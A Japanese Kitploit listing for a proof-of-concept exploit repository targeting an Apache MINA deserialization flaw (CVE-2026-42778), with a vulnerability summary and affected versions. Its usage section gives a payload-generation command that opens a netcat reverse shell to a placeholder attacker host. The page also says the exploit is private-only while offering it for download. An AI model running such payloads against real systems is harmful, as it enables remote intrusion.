Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-42778-POC — CVE-2026-42778 EUVD-2026-26492 信頼できないデータの逆シリアル化(CWE-502) | Kitploit
ツール/GitHubGitHub/akinfue/cve-2026-42778-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペイロード開発バイナリエクスプロイト
GitHubakinfue/cve-2026-42778-poc

CVE-2026-42778-POC

CVE-2026-42778 EUVD-2026-26492 信頼できないデータの逆シリアル化(CWE-502)

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-42778

概要

Apache MINA の AbstractIoBuffer.getObject() メソッドにおける不完全な修正。逆シリアライズ可能なクラスを制限するクラス名許可リスト検証が、読み取り対象クラスの静的初期化子が実行された後に適用されるため、検証が遅すぎます。これは、CVE-2024-52046 に対する元の修正が 2.1.X および 2.2.X ブランチに正しく適用されなかったために発生します。影響を受けるバージョン: - Apache MINA 2.1.0 から 2.1.11 - Apache MINA 2.2.0 から 2.2.6

エクスプロイト:

ダウンロードはこちら

詳細

  • CVE ID: CVE-2026-42778

  • 公開日: 2026年1月5日

  • 影響度: 重大

  • エクスプロイトの入手可能性: 非公開、プライベートのみ。

  • CVSS: 9.8

  • パッチの有無: (公式パッチはまだありません)

影響

攻撃者は悪意のあるシリアライズオブジェクトを作成し、IoBuffer.getObject() で処理されると、クラス名許可リスト検証が行われる前に静的初期化子を通じて任意のコードを実行できます。これは権限やユーザー操作を必要としないネットワーク経由で到達可能な脆弱性であるため、Apache MINA を使用し IoBuffer.getObject() メソッドを呼び出すアプリケーションではリモートコード実行が可能です。この脆弱性により、影響を受けるシステムの機密性、完全性、可用性が完全に侵害される可能性があります。

影響を受けるバージョン

  • Apache MINA 2.1.0 から 2.1.11
  • Apache MINA 2.2.0 から 2.2.6

使用方法

root@kitploit:~
# コンパイルと生成
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"

# ObjectSerializationCodecFactory を使用して MINA ベースのサービスにネットワーク経由で送信
# または IoBuffer.getObject() を呼び出す任意のエンドポイント

連絡先

  • お問い合わせ先:[email protected]
  • エクスプロイト : こちら
ツールをダウンロード